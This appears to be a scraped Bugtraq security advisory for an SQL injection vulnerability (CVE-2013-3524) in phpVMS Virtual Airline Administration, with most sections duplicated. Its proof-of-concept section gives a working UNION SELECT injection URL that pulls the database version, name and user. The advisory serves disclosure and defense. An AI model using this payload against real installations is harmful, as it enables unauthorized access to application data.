phpVMS Virtual Airline Administration 'itemid' Parameter SQL Injection Vulnerability
BID:59057
Info
phpVMS Virtual Airline Administration 'itemid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 59057 |
| Class: | Input Validation Error |
| CVE: |
CVE-2013-3524 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 15 2013 12:00AM |
| Updated: | May 22 2013 07:43PM |
| Credit: | NoGe |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
phpVMS Virtual Airline Administration 'itemid' Parameter SQL Injection Vulnerability
phpVMS Virtual Airline Administration is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpVMS Virtual Airline Administration version 2.1.934 and version 2.1.935 are vulnerable.
phpVMS Virtual Airline Administration is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
phpVMS Virtual Airline Administration version 2.1.934 and version 2.1.935 are vulnerable.
Exploit / POC
phpVMS Virtual Airline Administration 'itemid' Parameter SQL Injection Vulnerability
An attacker can exploit this issue using a web browser.
The following example URI is available:
http://www.example.com/path/index.php/PopUpNews/popupnewsitem/?itemid=123+union+select+1,version(),database(),4,user()--
An attacker can exploit this issue using a web browser.
The following example URI is available:
http://www.example.com/path/index.php/PopUpNews/popupnewsitem/?itemid=123+union+select+1,version(),database(),4,user()--
Solution / Fix
phpVMS Virtual Airline Administration 'itemid' Parameter SQL Injection Vulnerability
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently, we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
phpVMS Virtual Airline Administration 'itemid' Parameter SQL Injection Vulnerability
References:
References: